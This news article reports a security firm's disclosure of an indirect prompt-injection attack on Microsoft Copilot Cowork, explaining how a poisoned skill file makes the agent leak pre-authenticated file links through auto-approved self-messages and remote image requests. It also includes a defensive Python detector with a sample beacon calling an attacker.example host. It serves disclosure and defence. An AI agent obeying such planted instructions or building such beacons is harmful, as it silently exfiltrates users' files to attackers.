
Microsoft Copilot Cowork Can Silently Steal Your Files

Huma Shazia · 26 May 2026 at 8:12 am · 5 min read
Key Takeaways

Source: Hacker News: Best
  • Copilot Cowork's automatic action approvals for self-messages create a file exfiltration pathway
  • The attack achieved high success rates against state-of-the-art AI models including Claude Opus 4.7
  • Users cannot currently disable the vulnerable auto-approval behavior

Microsoft Copilot Cowork, the company's newest AI agent for enterprise productivity, has a security hole that lets attackers steal sensitive files without any user interaction. Security firm PromptArmor discovered that the feature's action approval system doesn't require permission when the AI sends messages to the active user, the very person it is acting for. This gap turns a helpful automation feature into a silent data siphon.

How the Attack Works

Copilot Cowork operates with your Microsoft 365 permissions. It can read files, send emails, and post Teams messages on your behalf. Microsoft's documentation claims the AI asks for permission before taking sensitive actions like sending emails or posting messages. In practice, that's not always true.

When Copilot sends a message to the active user (you, talking to yourself), it skips the approval step entirely. Users have no setting to change this behavior. The attack chain exploits this gap through indirect prompt injection.

Microsoft Copilot Cowork exfiltrates financial data and PII through the self-message loophole

Here's how it unfolds: an attacker creates a poisoned "skill" file containing hidden malicious instructions. When a victim uploads this file to Copilot Cowork (a common way to extend its functionality), the injected prompt manipulates the AI's behavior. The compromised agent then retrieves pre-authenticated download links for sensitive files the user can access. Anyone who opens one of these links can download the file.

The agent embeds these links in a Teams message or email sent to the user. When the victim opens the message, external image elements trigger network requests that transmit the stolen download links to attacker-controlled servers. Zero clicks required beyond viewing the message.

Victim asks Copilot Cowork for a recap, triggering the poisoned Skill
The fundamental issue is that LLMs cannot yet reliably distinguish between a user's trusted instructions and untrusted data found in files or websites.

— Security Researcher, PromptArmor

High Success Rate Against Modern AI Models

PromptArmor tested this attack against current AI models. The results should concern any enterprise using agentic AI tools. Claude Opus 4.7, one of Anthropic's most capable models, proved vulnerable. The attack achieved consistent success across state-of-the-art systems.

Copilot Cowork with Claude Opus 4.7 exfiltrates more documents than expected

The researchers note this isn't a bug in a specific AI model. It's a design problem with how agentic systems handle trust boundaries. When you give an AI agent broad permissions across an enterprise ecosystem, any weakness in one integrated system becomes an attack vector for the whole platform.

The Broader Agentic AI Risk

PromptArmor points out that each of Copilot Cowork's capabilities seems harmless in isolation. Reading files? Sending Teams messages? Both are normal productivity features. But combining these capabilities under a single AI agent that can be manipulated through prompt injection creates compound risks.

This mirrors earlier research by the same team showing how URL previews in communication apps became data exfiltration channels for AI agents. The pattern is consistent: AI systems that bridge multiple enterprise tools inherit the security weaknesses of all those tools.

Scheduled tasks increase risks by executing unattended and on a repeated basis

PromptArmor disclosed a separate vulnerability to Microsoft that directly allows data egress from Copilot Cowork's sandbox environment. They're publishing this research to help enterprises understand the risks of current agentic products.

What Security Experts Are Saying

The disclosure sparked significant discussion in security communities. On Hacker News, commenters focused on the fundamental architecture problem: when AI agents receive broad read/write permissions, the lack of a secure trust boundary between data sources and tool execution becomes catastrophic.

Reddit's cybersecurity community expressed concern about Microsoft's security defaults in its Frontier program. Several professionals noted the exploit effectively turns productivity software into a silent data pipeline to attackers.

What Enterprises Should Do Now

The attack requires the victim to upload a poisoned skill file. Organizations should treat skill files like executable code. Don't upload files from untrusted sources. Review what files your Copilot Cowork instances have access to.

  • Audit which users have Copilot Cowork enabled
  • Review permissions granted to AI agents in your Microsoft 365 environment
  • Establish policies for vetting skill files before upload
  • Monitor for unusual Teams or email activity from AI agents
  • Consider limiting Copilot Cowork access to sensitive SharePoint and OneDrive folders
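The last item in the list above, monitoring for unusual Teams or email activity from AI agents, has one concrete shape to look for, given under "How the Attack Works": a remote image whose address wraps a pre-authenticated download link, so that merely rendering the message leaks the link. The following is an added example, not PromptArmor's or Microsoft's code: a small Python checker that takes an HTML message body, flags image elements pointing off-tenant, and extracts any link wrapped inside their URL. `TRUSTED_HOSTS`, the sample message and the `attacker.example` host are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote, urlparse
# Hosts the tenant considers its own (constructed placeholder list; adjust per tenant).
TRUSTED_HOSTS = {"example-tenant.sharepoint.com", "teams.microsoft.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

class ImgCollector(HTMLParser):
    """Collect the src attribute of every <img> tag in an HTML message body."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)

def smuggled_urls(src):
    """Return http(s) URLs wrapped inside the path or query string of an image URL:
    fetching the image hands the inner link to whoever serves it."""
    parsed = urlparse(src)
    carried = URL_RE.findall(unquote(parsed.path))
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        for value in values:
            carried.extend(URL_RE.findall(unquote(value)))
    return carried

def flag_message(html):
    """Return findings for off-tenant image beacons. Severity is 'high' when the beacon
    carries a link back into a trusted host (a sharing link leaking), else 'medium'."""
    collector = ImgCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        host = (urlparse(src).hostname or "").lower()
        if host in TRUSTED_HOSTS:
            continue  # first-party images are expected in normal messages
        carried = smuggled_urls(src)
        leaks_internal = any((urlparse(u).hostname or "") in TRUSTED_HOSTS for u in carried)
        findings.append({"src": src, "host": host, "carried_links": carried,
                         "severity": "high" if leaks_internal else "medium"})
    return findings

# Constructed sample: a first-party logo plus a 1x1 remote beacon whose query string
# wraps a (fake) pre-authenticated SharePoint sharing link.
SAMPLE_MESSAGE = (
    '<p>Weekly recap.</p><img src="https://example-tenant.sharepoint.com/_layouts/15/images/logo.png">'
    '<img src="https://attacker.example/b.gif?u=https%3A%2F%2Fexample-tenant.sharepoint.com%2F%3As%2Fw%2FQ3.xlsx%3Fe%3Dabc123" width="1" height="1">'
)
```

The checker is agnostic to where the message body comes from; in practice you would feed it the bodies of messages the agent sent on the user's behalf and alert on any 'high' finding.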

Microsoft hasn't publicly commented on a timeline for addressing the auto-approval gap. Until then, the self-message loophole remains open.


Frequently Asked Questions

What is indirect prompt injection?

Indirect prompt injection embeds malicious instructions in content the AI processes (files, emails, web pages) rather than in the prompt the user types. The AI follows these hidden instructions because it can't distinguish trusted commands from untrusted data.

Can I disable the auto-approval for self-messages?

No. Microsoft currently doesn't provide a setting to require approval when Copilot sends messages to the active user. This is the core gap enabling the attack.

Which files are at risk from this vulnerability?

Any files the user can access through SharePoint or OneDrive. Copilot can retrieve pre-authenticated download links for these files, which work for anyone who opens them.

Does this affect all Microsoft 365 customers?

Only organizations using Copilot Cowork, which is currently a Frontier feature. Standard Microsoft 365 Copilot may have different permission models.

Has Microsoft patched this vulnerability?

The auto-approval gap remains as of this disclosure. PromptArmor separately disclosed a sandbox escape vulnerability to Microsoft; that issue may be addressed independently of the auto-approval gap.


Huma Shazia

Senior AI & Tech Writer
